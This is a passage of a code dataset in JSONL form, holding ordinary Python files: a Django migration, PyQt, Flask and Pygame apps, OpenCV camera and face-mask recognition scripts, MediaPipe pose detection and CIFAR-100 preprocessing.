pass')\n\n \n","repo_name":"balao1312/project_104_multi","sub_path":"consumer.py","file_name":"consumer.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"19042280702","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('users', '0010_membership_payment'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='membership',\n name='approved_by',\n field=models.ForeignKey(related_name='memberships_approved', blank=True, to=settings.AUTH_USER_MODEL, null=True),\n preserve_default=True,\n ),\n ]\n","repo_name":"bkawan/manutd.org.np","sub_path":"apps/users/migrations/0011_membership_approved_by.py","file_name":"0011_membership_approved_by.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"10469855880","text":"import sys\nfrom PyQt4 import QtGui, QtCore\n\nclass Window(QtGui.QMainWindow):\n def __init__(self):\n super(Window, self).__init__()\n self.setGeometry(50, 50, 500, 300)\n self.setWindowTitle(\"System Monitoring\")\n self.setWindowIcon(QtGui.QIcon('favicon.png'))\n\n extractAction = QtGui.QAction('&Quit', self)\n extractAction.setShortcut(\"Ctrl+Q\")\n extractAction.setStatusTip('Leave the App')\n extractAction.triggered.connect(self.close_application)\n self.statusBar()\n mainMenu = self.menuBar()\n fileMenu = mainMenu.addMenu('&File')\n fileMenu.addAction(extractAction)\n \n self.home()\n #Tool bars are usually specific to the page that they are on\n #Therefore, we add them to the page itself instead of the core init\n def home(self):\n btn = QtGui.QPushButton('Quit', self)\n btn.clicked.connect(self.close_application)\n btn.resize(btn.minimumSizeHint())\n btn.move(35,35)\n #Setting up a button on the toolbar\n #You can replace the icon parameter with text if you don't want an image\n #First parameter is the icon, second is the hover message, third is self\n extractAction = QtGui.QAction(QtGui.QIcon('favicon.png'),'Quit', self)\n extractAction.triggered.connect(self.close_application)\n\n #This sets up the toolbar\n self.toolbar = self.addToolBar(\"Extraction\")\n #Adding our button to the toolbar\n self.toolbar.addAction(extractAction)\n \n self.show()\n\n def close_application(self):\n sys.exit()\n\n\ndef run(): \n app = QtGui.QApplication(sys.argv)\n GUI = Window()\n sys.exit(app.exec_())\n\nif __name__ == '__main__':\n run()\n","repo_name":"NathanJiangCS/Exploring-Python","sub_path":"PyQt/Tool Bar.py","file_name":"Tool Bar.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"40253799615","text":"from nepali_datetime import date\nimport os\n\nfinancial_year_start = '04-01'\ndatabases = ['stock&vat.db','transactions.db']\n\ndef check_year():\n if 'old_databases' not in os.listdir():\n os.makedirs('old_databases')\n today_date = str(date.today())[5:]\n year = str(date.today())[:4]\n\n if (today_date==financial_year_start):\n new_dir = str(int(year)-1)+'-'+ year +'_databases'\n os.makedirs('old_databases/'+new_dir)\n\n \n for db in databases:\n 
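 # move each database file into the archived financial-year folder\n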
os.rename(db,'old_databases/'+new_dir+'/'+db)","repo_name":"imbishal7/accounting-with-vat","sub_path":"financial_year.py","file_name":"financial_year.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"70909388408","text":"import pickle\n\nfrom flask import Flask, request, jsonify\nimport joblib\n\napp = Flask(__name__)\n\nwith open(\"dv.bin\", \"rb\") as infile:\n dv = pickle.load(infile)\n\nwith open(\"model1.bin\", \"rb\") as infile:\n model = pickle.load(infile)\n\n\n@app.route('/predict', methods=['POST'])\ndef predict():\n data = request.get_json()\n X = dv.transform([data])\n prediction = model.predict_proba(X)[0]\n\n result = {\n 'prediction': prediction\n }\n\n return jsonify(result)\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"ayehninnkhine/MLZoompcamp-Week5","sub_path":"Flask-predict.py","file_name":"Flask-predict.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"40853605008","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n#import cvlib as CV\n#from cvlib.object_detection import draw_bbox\n\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\nfrom numpy import size\nfrom cls_File import *\nfrom cls_GlobalVarialble import *\n\nimport cv2\nimport mainwindow as main\n\n\n\nclass Cam:\n \n def __init__(self):\n \n self.camNum = int(GlobalVariable.CameraNum);\n #self.cap = self.cam_cap()\n self.videoStart = False\n #self.width = int(self.cap.get(cv2.CAP_PROP_FRAME_WIDTH))\n #self.height = int(self.cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\n #self.fps = int(self.cap.get(cv2.CAP_PROP_FPS))\n self.fcc = cv2.VideoWriter_fourcc('M', 'J', 'P', 'G')\n \n self.detectMode = False\n self.frame = None\n self.detectObject = []\n\n \n def cam_cap(self):\n \n tmpcap = cv2.VideoCapture(self.camNum)\n return tmpcap\n \n \n def cam_isOpen(self):\n \n if self.cap.isOpened():\n print(\"Cam Connect\")\n return True\n else:\n print(\"Cam Connect Fail\")\n return True\n \n def cam_capture(self):\n \n if self.cam_isOpen:\n ret, frame = self.cap.read()\n frame = cv2.flip(frame,1) # 좌우 대칭\n tmpframe = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n frame = None\n \n if ret:\n \n if self.detectMode:\n \n #bbox, self.detectObject, conf = CV.detect_common_objects(tmpframe)\n #print(bbox, label, conf)\n #drawframe = draw_bbox(tmpframe,bbox,self.detectObject,conf,write_conf=True)\n pass\n \n \n else:\n \n \n return tmpframe\n\n \n \n def cam_video_Save(self):\n \n i = 1\n date = File.get_Today()\n dir1 = GlobalVariable.videoPath\n File.make_foloder(dir1)\n dir2 = GlobalVariable.videoPath + \"/\" + date\n File.make_foloder(dir2)\n \n while True:\n \n Videopath = dir2 + \"/\" + str(i)+ \".avi\"\n \n if not os.path.exists(Videopath):\n out = cv2.VideoWriter(Videopath, self.fcc, self.fps, (self.width, self.height),isColor=True) # 3 width, 4 height\n break\n else:\n i += 1\n \n while self.videoStart:\n \n if self.cam_isOpen:\n \n ret, frame = self.cap.read()\n frame = cv2.flip(frame,1) # 좌우 대칭\n \n if ret:\n out.write(frame)\n\n \n else:\n print(\"Cam is Not Open\")\n \n def cam_video_Save(self,imageArr):\n \n \n i = 1\n date = File.get_Today()\n dir1 = GlobalVariable.videoPath\n File.make_foloder(dir1)\n dir2 = GlobalVariable.videoPath + \"/\" + date\n File.make_foloder(dir2)\n \n #size = (imageArr[0].width,imageArr[0].height)\n \n \n while True:\n \n Videopath 
= dir2 + \"/\" + str(i)+ \".avi\"\n \n if not os.path.exists(Videopath):\n # img_arry = []\n # for i in range(len(imageArr)):\n # #image = cv2.cvtColor(imageArr[i],cv2.COLOR_BGR2RGB)\n # #img = cv2.imread(image)\n # height, width, layers = imageArr[0].shape\n # size = (width,height)\n # img_arry.append(imageArr)\n \n # #out = cv2.VideoWriter(Videopath, self.fcc, 30, (1280, 720),isColor=True)\n # out = cv2.VideoWriter(Videopath, cv2.VideoWriter_fourcc(*'DIVX'),15,size)\n # for i in range(len(img_arry)):\n # out.write(img_arry[i])\n # #out.release() \n fps = 30\n frame_array = []\n \n out = cv2.VideoWriter(Videopath,cv2.VideoWriter_fourcc(*'DIVX'), fps, (640,480))\n for i in range(len(imageArr)):\n # writing to a image array\n out.write(imageArr[i])\n out.release()\n break\n else:\n i += 1\n \n \n \n \n \n def cam_Image_Save(self,image):\n \n i = 1\n \n date = File.get_Today()\n dir1 = GlobalVariable.imagePath\n File.make_foloder(dir1)\n dir2 = GlobalVariable.imagePath + \"/\" + date\n File.make_foloder(dir2)\n \n image = cv2.cvtColor(image,cv2.COLOR_BGR2RGB)\n \n while True:\n \n imgpath = dir2 + \"/\" + str(i)+ \".jpg\"\n \n if not os.path.exists(imgpath):\n cv2.imwrite(imgpath,image)\n break\n \n else:\n \n i += 1\n \n def cam_Video_Image_Save(self,image):\n \n i = 1\n j = 1\n \n date = File.get_Today()\n dir1 = GlobalVariable.videoPath\n File.make_foloder(dir1)\n dir2 = GlobalVariable.videoPath + \"/\" + date\n File.make_foloder(dir2)\n dir3 = GlobalVariable.videoPath + \"/\" + date + \"/\" + str(j)\n \n while True:\n if not os.path.isdir(dir3):\n os.mkdir(dir3)\n break\n else:\n j +=1\n \n image = cv2.cvtColor(image,cv2.COLOR_BGR2RGB)\n \n while True:\n \n imgpath = dir3 + \"/\" + str(i)+ \".jpg\"\n \n if not os.path.exists(imgpath):\n cv2.imwrite(imgpath,image)\n break\n \n else:\n \n i += 1\n\n def cam_Image_Load(self,Path):\n \n try:\n \n img = cv2.imread(Path, cv2.IMREAD_COLOR)\n frame = cv2.cvtColor(img,cv2.COLOR_BGR2RGB)\n #resizeframe = cv2.resize(frame, dsize=(int(GlobalVariable.cameraX),int(GlobalVariable.cameraY)),interpolation=cv2.INTER_AREA)\n return frame\n \n except:\n pass\n\n def cam_Video_Load(self,path,GrabVideo):\n \n cap = cv2.VideoCapture(path)\n\n # 프레임 너비/높이, 초당 프레임 수 확인\n width = cap.get(cv2.CAP_PROP_FRAME_WIDTH) # 또는 cap.get(3)\n height = cap.get(cv2.CAP_PROP_FRAME_HEIGHT) # 또는 cap.get(4)\n fps = cap.get(cv2.CAP_PROP_FPS) # 또는 cap.get(5)\n print('프레임 너비: %d, 프레임 높이: %d, 초당 프레임 수: %d' %(width, height, fps))\n \n while cap.isOpened(): \n ret, frame = cap.read()\n \n if not ret:\n \n break\n\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n \n tmpImage = QImage(frame.data, frame.shape[1], frame.shape[0], QImage.Format_RGB888)\n scene = QGraphicsScene()\n pixmap = QPixmap(tmpImage)\n item = QGraphicsPixmapItem(pixmap)\n scene.addItem(item)\n GrabVideo.setScene(scene)\n \n #return frame\n\n \n \n\n \n def SLAM_Image_Save(self,image):\n \n i = 1\n \n date = File.get_Today()\n dir1 = GlobalVariable.slamimagepath\n File.make_foloder(dir1)\n dir2 = GlobalVariable.slamimagepath + \"/\" + date\n File.make_foloder(dir2)\n \n #image = cv2.cvtColor(image)\n \n while True:\n \n imgpath = dir2 + \"/\" + str(i)+ \".png\"\n \n if not os.path.exists(imgpath):\n cv2.imwrite(imgpath,image)\n break\n \n else:\n \n i += 1\n \n ","repo_name":"PARKKYEONGCHOON/GuideRobot","sub_path":"robotsystem-COPY/scripts/cls_Cam.py","file_name":"cls_Cam.py","file_ext":"py","file_size_in_byte":8216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} 
+{"seq_id":"21919216865","text":"#!/usr/bin/python3\n# -*- coding: Utf-8 -*\n\n\"\"\"\n!!!! MacGyver Escape Game !!!!\nAuthor: Jimi Bourgeois\nVersion: 20190225\nProject: Project 3 OpenClassrooms\nCode language: Python3\nCoding: Utf-8\n\"\"\"\n#import the game interface module\nimport pygame\n#import modules for game operation\nfrom pygame.locals import *\nfrom structure_lab import *\nfrom constants import *\nfrom macgyver import *\n\ndef main():\n \"\"\"\n\tInitializes the game's interface, window size, name the window and game menu\n\n\tMain loop of the game:\n\tDisplays the maze in its various states after the player moves\n\tThe player recovers the objects simply by moving on them\n\tThe objects are placed randomly each time the game is loaded\n\tA counter indicates the progress of recovery of objects\n\tThe player wins under the condition to retrieve all the objects and find the\n\tgoalkeeper to go out otherwise the player loses\n\t\"\"\"\n\n pygame.init()\n\t#initialize the size of the window\n screen = pygame.display.set_mode((SIZE_SCREEN_WIDTH, SIZE_SCREEN_HEIGTH))\n\t#window name\n pygame.display.set_caption('MacGyver Escape Game')\n\n #main loop\n main_loop = 1\n while main_loop:\n #Formatting the game menu\n background = pygame.image.load(IMG_BACK).convert()\n bfont = pygame.image.load(IMG_BFONT).convert()\n screen.blit(bfont, (0, 600))\n screen.blit(background, (0, 0))\n pygame.display.update()\n\n #Loop of game menu and choice of level\n #Preventive loop in case of setting up several levels\n game_loop = 1\n home_loop = 1\n while home_loop:\n #limit of frame\n pygame.time.Clock().tick(30)\n for event in pygame.event.get():\n if event.type == QUIT or event.type == KEYDOWN and event.key == K_ESCAPE:\n home_loop = 0\n game_loop = 0\n main_loop = 0\n choice = 0\n elif event.type == KEYDOWN:\n if event.key == K_RETURN:\n home_loop = 0\n choice = 'map.txt'\n\n #Loading the chosen level\n if choice != 0:\n level = Load_structure_map(choice)\n level.load_map()\n level.load_structure(screen)\n\n mg = Character(IMG_MAC, level)\n\n #Loop of the game, update of the screen of the movement of the player\n #according to the direction taken, according to the collection of\n #objects and conditions of exit\n while game_loop:\n #limit of frame\n pygame.time.Clock().tick(30)\n for event in pygame.event.get():\n if event.type == QUIT:\n game_loop = 0\n home_loop = 0\n\n elif event.type == KEYDOWN:\n if event.key == K_ESCAPE:\n game_loop = 0\n elif event.key == K_RIGHT:\n mg.move('right')\n elif event.key == K_LEFT:\n mg.move('left')\n elif event.key == K_UP:\n mg.move('up')\n elif event.key == K_DOWN:\n mg.move('down')\n\n level.load_structure(screen)\n screen.blit(mg.direction, (mg.mg_pos_x, mg.mg_pos_y))\n pygame.display.flip()\n\n #Display of objects recovery\n no_items = pygame.image.load(IMG_NO_ITEMS).convert()\n screen.blit(no_items, (180, 600))\n pygame.display.flip()\n\n if len(mg.item_loot) == 1:\n items_1_3 = pygame.image.load(IMG_ITEMS_1_3).convert()\n screen.blit(items_1_3, (180, 600))\n pygame.display.flip()\n\n if len(mg.item_loot) == 2:\n items_2_3 = pygame.image.load(IMG_ITEMS_2_3).convert()\n screen.blit(items_2_3, (180, 600))\n pygame.display.flip()\n\n if len(mg.item_loot) == 3:\n items_3_3 = pygame.image.load(IMG_ITEMS_3_3).convert()\n screen.blit(items_3_3, (180, 600))\n pygame.display.flip()\n\n #Exit conditions\n if level.structure[mg.mg_y][mg.mg_x] == 'G':\n if len(mg.item_loot) == 3:\n #Victory screen display\n win = pygame.image.load(IMG_MACWIN).convert()\n bfont = 
pygame.image.load(IMG_BFONT).convert()\n screen.blit(bfont, (0, 600))\n screen.blit(win, (0, 0))\n pygame.display.update()\n home_loop = 0\n\n else:\n #Defeat screen display\n loose = pygame.image.load(IMG_MACLOOSE).convert()\n bfont = pygame.image.load(IMG_BFONT).convert()\n screen.blit(bfont, (0, 600))\n screen.blit(loose, (0, 0))\n pygame.display.update()\n home_loop = 0\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Bibjim/P3_MG_Pygame","sub_path":"game_app.py","file_name":"game_app.py","file_ext":"py","file_size_in_byte":5209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"73049083770","text":"import sys\nsys.path.append('../utils')\nsys.path.append('../configs')\n\nfrom sklearn.model_selection import train_test_split\n# ../utils\nfrom reader import read_pkl\nfrom writer import write_npy, create_muldir\nfrom dataset_op import label_count\n\n# ../configs\nfrom path import CIFAR100PATH, CIFARPROCESSED\nfrom info import CIFARNCLASS\n\nimport numpy as np\nimport pickle\n\n\ntrain = read_pkl(CIFAR100PATH+'train', encoding='bytes')\ntest = read_pkl(CIFAR100PATH+'test', encoding='bytes')\n\ntrain_image = train[b'data'].astype(np.float32)/255\ntest_image = test[b'data'].astype(np.float32)/255\n\npixel_mean = np.mean(train_image, axis=0) # use global pixel mean only for train data\n\ntrain_image -= pixel_mean\ntest_image -= pixel_mean\n\ntrain_image = np.transpose(np.reshape(train_image, [-1,3,32,32]), [0,2,3,1])\ntrain_label = np.array(train[b'fine_labels'])\n\ntest_image = np.transpose(np.reshape(test_image, [-1,3,32,32]), [0,2,3,1])\ntest_label = np.array(test[b'fine_labels'])\n\ntrain_image, val_image, train_label, val_label = train_test_split(train_image, train_label, test_size=0.1, random_state=40, stratify=train_label) # Train Val split\n\nprint(\"Total of classes : %d\"%CIFARNCLASS)\nprint(\"Train info\")\nprint(\"Image : {}({}), Label : {}\".format(train_image.shape, train_image.dtype, train_label.shape))\nprint(\"Val info\")\nprint(\"Image : {}({}), Label : {}\".format(val_image.shape, val_image.dtype, val_label.shape))\nprint(\"Test info\")\nprint(\"Image : {}({}), Label : {}\".format(test_image.shape, test_image.dtype, test_label.shape))\n\ntrain_class_count = label_count(train_label, CIFARNCLASS)\nval_class_count = label_count(val_label, CIFARNCLASS)\ntest_class_count = label_count(test_label, CIFARNCLASS)\n\nprint(\"Train class mean : {}, std : {}\".format(np.mean(train_class_count), np.std(train_class_count)))\nprint(\"Val class mean : {}, std : {}\".format(np.mean(val_class_count), np.std(val_class_count)))\nprint(\"Test class mean : {}, std : {}\".format(np.mean(test_class_count), np.std(test_class_count)))\n\ncreate_muldir(CIFARPROCESSED)\nwrite_npy(train_image, CIFARPROCESSED+'train_image.npy') \nwrite_npy(train_label, CIFARPROCESSED+'train_label.npy') \nwrite_npy(val_image, CIFARPROCESSED+'val_image.npy') \nwrite_npy(val_label, CIFARPROCESSED+'val_label.npy') \nwrite_npy(test_image, CIFARPROCESSED+'test_image.npy') \nwrite_npy(test_label, CIFARPROCESSED+'test_label.npy') \n","repo_name":"maestrojeong/Deep-Hash-Table-ICML18","sub_path":"process/cifar_process.py","file_name":"cifar_process.py","file_ext":"py","file_size_in_byte":2358,"program_lang":"python","lang":"en","doc_type":"code","stars":66,"dataset":"github-code","pt":"77"} +{"seq_id":"27348543333","text":"# as module\n\nimport cv2\nimport mediapipe as mp \nimport time\nimport math\n\n# we are creating class so that we can create object and 
able to have/use methods\nclass poseDetector():\n\n def __init__(self):\n\n self.mp_drawing_styles = mp.solutions.drawing_styles \n self.mpDraw = mp.solutions.drawing_utils\n self.mpPose = mp.solutions.pose\n self.pose = self.mpPose.Pose() #creating pose\n \n def findPerson(self, img, draw=False):\n\n # this img is in BGR therefore...we convert it into RGB\n # imgRGB = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n # self.results = self.pose.process(imgRGB)\n self.results = self.pose.process(img)\n # print(self.results.pose_landmarks)\n\n if self.results.pose_landmarks: # landmarks are there AND\n if draw: \n # Draw pose landmarks on the image. (0 to 32 points are there)\n self.mpDraw.draw_landmarks(img, self.results.pose_landmarks,self.mpPose.POSE_CONNECTIONS, landmark_drawing_spec= self.mp_drawing_styles.get_default_pose_landmarks_style()) # (img, make all the points, connect all the points, make all the points color different) \n # else:\n # print('no body is shown...')\n\n return img\n\n def findPosition(self, img, draw=False):\n self.lmList = [] #landmark list\n if self.results.pose_landmarks: #not none\n for id, lm in enumerate(self.results.pose_landmarks.landmark):\n h, w, c = img.shape #height, width, no. of channels(here is 3(which are Red, Blue, Green))\n # print(\"img.shape\",img.shape)\n # print(id, lm) #lm-> landmark values are the ratio of images\n\n # to get actual pixel values of lm\n cx, cy = int(lm.x*w) , int(lm.y*h)\n self.lmList.append([id,cx,cy]) \n\n if draw:\n #drawing circle at landmark points( just for checking)\n cv2.circle(img, (cx, cy), 3, (255,0,0), cv2.FILLED)\n # cv2.putText(img, str(id), (cx,cy), cv2.FONT_ITALIC, 1, (255,0,255), 2) # printing landmark count on body \n\n return self.lmList\n\n def findAngle(self, img, p1, p2, p3, draw= True, showAngle= False):\n\n # getting targeted landmarks x,y coordinates values\n p1_x, p1_y = self.lmList[p1][1:] # OR lmList[p1][1], lmList[p1][2])\n p2_x, p2_y = self.lmList[p2][1:]\n p3_x, p3_y = self.lmList[p3][1:]\n \n #finding angle\n angle = math.degrees(math.atan2(p3_y - p2_y, p3_x - p2_x) - math.atan2(p1_y - p2_y, p1_x - p2_x)) # math.degrees() will convert radian value to degree\n \n angle = (angle + 180) % 360 - 180\n angle = abs(angle)\n \n # drawing and joining targeted points\n if draw:\n # drawing joining line btw 3 points\n cv2.line(img, (p1_x, p1_y), (p2_x, p2_y), (255,255,255), 3)\n cv2.line(img, (p2_x, p2_y), (p3_x, p3_y), (255,255,255), 3)\n #highlighting 3 points\n cv2.circle(img, (p1_x,p1_y), 8, (0,0,255), cv2.FILLED)\n cv2.circle(img, (p1_x,p1_y), 12, (0,0,255), 2)\n cv2.circle(img, (p2_x,p2_y), 8, (0,0,255), cv2.FILLED)\n cv2.circle(img, (p2_x,p2_y), 12, (255,0,0), 2)\n cv2.circle(img, (p3_x,p3_y), 8, (0,0,255), cv2.FILLED)\n cv2.circle(img, (p3_x,p3_y), 12, (0,0,255), 2)\n\n if showAngle:\n cv2.putText(img, str(int(angle)), (p2_x+5, p2_y+5), cv2.FONT_HERSHEY_PLAIN, 2, (255,0,0), 2) \n\n return angle\n ","repo_name":"MadhavAgarwal1/Personal_Fitness_Gym","sub_path":"pose_Detector.py","file_name":"pose_Detector.py","file_ext":"py","file_size_in_byte":3653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"5525409923","text":"import cv2\nimport os\nimport numpy\nimport pandas\nfrom sklearn.decomposition import PCA\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.neighbors import KNeighborsClassifier\nimport warnings\n\n# Carrega um dataframe da biblioteca Pandas com as imagens para treinamento\ndef load_data_frame():\n # Cria um dict para 
organizar os dados\n data = {\n \"FILE\": [],\n \"LABEL\": [],\n \"TARGET\": [],\n \"IMAGE\": []\n }\n\n # Carrega as imagens com mascara e sem mascara\n mask = os.listdir(f\"images{os.sep}maskon\")\n no_mask = os.listdir(f\"images{os.sep}maskoff\")\n\n # Percorre o diretorio de imagens com mascara e preenche o dict data com as informações de cada imagem\n for file in mask:\n data[\"FILE\"].append(f\"images{os.sep}maskon{os.sep}{file}\")\n data[\"LABEL\"].append(f\"Com mascara\")\n data[\"TARGET\"].append(1)\n image = cv2.cvtColor(cv2.imread(f\"images{os.sep}maskon{os.sep}{file}\"), cv2.COLOR_BGR2GRAY).flatten()\n data[\"IMAGE\"].append(image)\n\n # Percorre o diretorio de imagens sem mascara e preenche o dict data com as informações de cada imagem\n for file in no_mask:\n data[\"FILE\"].append(f\"train{os.sep}maskoff{os.sep}{file}\")\n data[\"LABEL\"].append(f\"Sem mascara\")\n data[\"TARGET\"].append(0)\n image = cv2.cvtColor(cv2.imread(f\"images{os.sep}maskoff{os.sep}{file}\"), cv2.COLOR_BGR2GRAY).flatten()\n data[\"IMAGE\"].append(image)\n\n return pandas.DataFrame(data)\n\n# Divide o dataframe para treino e teste\ndef train_test(data_frame):\n X = list(data_frame[\"IMAGE\"])\n Y = list(data_frame[\"TARGET\"])\n\n return X, Y\n\n# Calcula a projeção dos dados em um vetor que maximize a variança dos dados e perca a menor quantidade de informação possível e realiza a extração de features das imagens\ndef pca_model(X_train):\n pca = PCA(n_components=30)\n pca.fit(X_train)\n\n return pca\n\n# Prever valores de quaisquer novos pontos de dados. O novo ponto recebe um valor baseado em quão próximo ele se parece dos pontos no conjunto de treinamento\ndef knn(X_train, Y_train):\n warnings.filterwarnings(\"ignore\")\n\n grid_params = {\n \"n_neighbors\": [2, 3, 5, 11, 19, 23, 29],\n \"weights\": [\"uniform\", \"distance\"],\n \"metric\": [\"euclidean\", \"manhattam\", \"cosine\", \"l1\", \"l2\"]\n }\n\n knn_model = GridSearchCV(KNeighborsClassifier(), grid_params, refit=True)\n knn_model.fit(X_train, Y_train)\n\n return knn_model\n\n# Define o path xml para pré-treino com o Cascade Classifier, reconhecendo rostos de forma genérica\nhaar_file = 'haarcascade_frontalface_alt2.xml'\n# Define o path do dataset para treinos\ndataset = 'dataset'\n\n# Cria uma lista de imagens e um lista com os nomes correspondentes\nimages = []\nlabels = []\nnames = {}\nid = 0\n\n# Percorre o diretório de datasets e preenche o array de imagens e nomes com os arquivos correspondentes\nfor (subdirs, dirs, files) in os.walk(dataset):\n for subdir in dirs:\n names[id] = subdir\n subdir_path = os.path.join(dataset, subdir)\n for file_name in os.listdir(subdir_path):\n path = subdir_path + \"/\" + file_name\n label = id\n images.append(cv2.imread(path, 0))\n labels.append(int(label))\n id += 1\n\n# Define o tamanho da área de reconhecimento\nwidth = 130\nheight = 100\n\n# Cria um array numpy para auxiliar nas comparações por conta de seus métodos\n(images, labels) = [numpy.array(lis) for lis in [images, labels]]\n\n# Treina o modelo com as imagens do dataset\nmodel = cv2.face.LBPHFaceRecognizer_create()\nmodel.train(images, labels)\n\n# Importa o XML para auxiliar no reconhecimento\nface_cascade = cv2.CascadeClassifier(haar_file)\n\n# Instancia a webcam\nwebcam = cv2.VideoCapture(0)\n\n# Carrega o dataframe com as imagens para treinamento\ndata_frame = load_data_frame()\n\n# Divide conjuntos de treino e teste\nX_train, y_train = train_test(data_frame)\n\n# Modelo PCA para extração de features da imagem\npca = 
pca_model(X_train)\n\n# Conjunto de treino com features extraídas\nX_train = pca.transform(X_train)\n\n# Treinando modelo classificatório KNN.\nknn = knn(X_train, y_train)\n\n# Rotulo para classificação\nlabel = {\n 0: \"Sem mascara\",\n 1: \"Com mascara\"\n}\n\nwhile True:\n # Inicia a camera\n (_, image) = webcam.read()\n\n # Converte a imagem capturada pela camera em cinza\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n # Retorna um retangulo com as coordenadas ao redor da face encontrada\n faces = face_cascade.detectMultiScale(gray)\n\n # Fecha o loop ao apertar Q\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n \n # Percorre as informações das faces encontradas\n for (x, y, w, h) in faces:\n face = gray[y:y + h, x:x + w]\n face_resize = cv2.resize(face, (width, height))\n\n # Retorna a porcentagem de similaridade da face detectada com o dataset\n prediction = model.predict(face_resize)\n\n classification = \"\"\n color = (0, 255, 0)\n\n # Lógica para dizer se está com mascara ou nao\n if face.shape[0] >= 200 and face.shape[1] >= 200:\n #Extrai as features da imagem.\n vector = pca.transform([face_resize.flatten()]) \n\n # Tenta identificar se está com máscara ou não.\n pred = knn.predict(vector)[0] \n\n # Busca a label conforme a identificação.\n classification = label[pred] \n\n # Alterando a cor do retangulo caso esteja sem mascara.\n if pred == 0:\n color = (0,0,255)\n\n # Mostra um retângulo ao redor do rosto do usuário.\n cv2.rectangle(image, (x, y), (x + w, y + h), color, 3)\n\n # O valor que calibra o reconhecimento, quanto menor o valor, mais preciso é a leitura da imagem gravada no treinamento.\n if prediction[1] < 120:\n # Coloca o texto acima da área reconhecida\n cv2.putText(image, '% s - %.0f - % s' % (names[prediction[0]], prediction[1], classification), (x - 10, y - 10), cv2.FONT_HERSHEY_PLAIN, 1, color)\n else:\n # Se a face não for reconhecida, mostra o desconhecido e detecta se está com máscara ou sem\n cv2.putText(image, 'Desconhecido - % s' % (classification), (x - 10, y - 10), cv2.FONT_HERSHEY_PLAIN, 1, color)\n\n # Exibir a imagem da camera em uma janela.\n cv2.imshow('Leitura Facial', image)\n","repo_name":"gabriell-ferreira/mask-detect","sub_path":"recognizer.py","file_name":"recognizer.py","file_ext":"py","file_size_in_byte":6054,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"18917453936","text":"# import os\n# import cv2\n# import pdb\n# import time\n# import warnings\n# import random\n# import numpy as np\n# import pandas as pd\n# from tqdm import tqdm_notebook as tqdm\n# from torch.optim.lr_scheduler import ReduceLROnPlateau\n# from sklearn.model_selection import StratifiedKFold\n# import torch\n# import torch.nn as nn\n# from torch.nn import functional as F\n# import torch.optim as optim\n# import torch.backends.cudnn as cudnn\n# from torch.utils.data import DataLoader, Dataset, sampler\n# from matplotlib import pyplot as plt\n# from albumentations import (HorizontalFlip, ShiftScaleRotate, Normalize, Resize, Compose, GaussNoise)\n# from albumentations.torch import ToTensor\n# # import segmentation_models_pytorch as smp\n# from utils.RleFunction import run_length_decode\n# warnings.filterwarnings(\"ignore\")\n# class SIIMDataset(Dataset):\n# def __init__(self, df, data_folder, size, mean, std, phase):\n# self.df = df\n# self.root = data_folder\n# self.size = size\n# self.mean = mean\n# self.std = std\n# self.phase = phase\n# self.transforms = get_transforms(phase, size, mean, std)\n# 
self.gb = self.df.groupby('ImageId')\n# self.fnames = list(self.gb.groups.keys())\n#\n# def __getitem__(self, idx):\n# image_id = self.fnames[idx]\n# df = self.gb.get_group(image_id)\n# annotations = df[' EncodedPixels'].tolist()\n# image_path = os.path.join(self.root, image_id + \".png\")\n# image = cv2.imread(image_path)\n# mask = np.zeros([1024, 1024])\n# if annotations[0] != '-1':\n# for rle in annotations:\n# mask += run_length_decode(rle)\n# mask = (mask >= 1).astype('float32') # for overlap cases\n# augmented = self.transforms(image=image, mask=mask)\n# image = augmented['image']\n# mask = augmented['mask']\n# return image, mask\n#\n# def __len__(self):\n# return len(self.fnames)\n#\n#\n# def get_transforms(phase, size, mean, std):\n# list_transforms = []\n# if phase == \"train\":\n# list_transforms.extend(\n# [\n# # HorizontalFlip(),\n# ShiftScaleRotate(\n# shift_limit=0, # no resizing\n# scale_limit=0.1,\n# rotate_limit=10, # rotate\n# p=0.5,\n# border_mode=cv2.BORDER_CONSTANT\n# ),\n# # GaussNoise(),\n# ]\n# )\n# list_transforms.extend(\n# [\n# Normalize(mean=mean, std=std, p=1),\n# Resize(size, size),\n# ToTensor(),\n# ]\n# )\n#\n# list_trfms = Compose(list_transforms)\n# return list_trfms\n#\n#\n# def provider(\n# fold,\n# total_folds,\n# data_folder,\n# df_path,\n# phase,\n# size,\n# mean=None,\n# std=None,\n# batch_size=8,\n# num_workers=4,\n# ):\n# df = pd.read_csv(df_path)\n# df = df.drop_duplicates('ImageId')\n# df_with_mask = df[df[\" EncodedPixels\"] != \" -1\"]\n# df_with_mask['has_mask'] = 1\n# df_without_mask = df[df[\" EncodedPixels\"] != \" -1\"]\n# 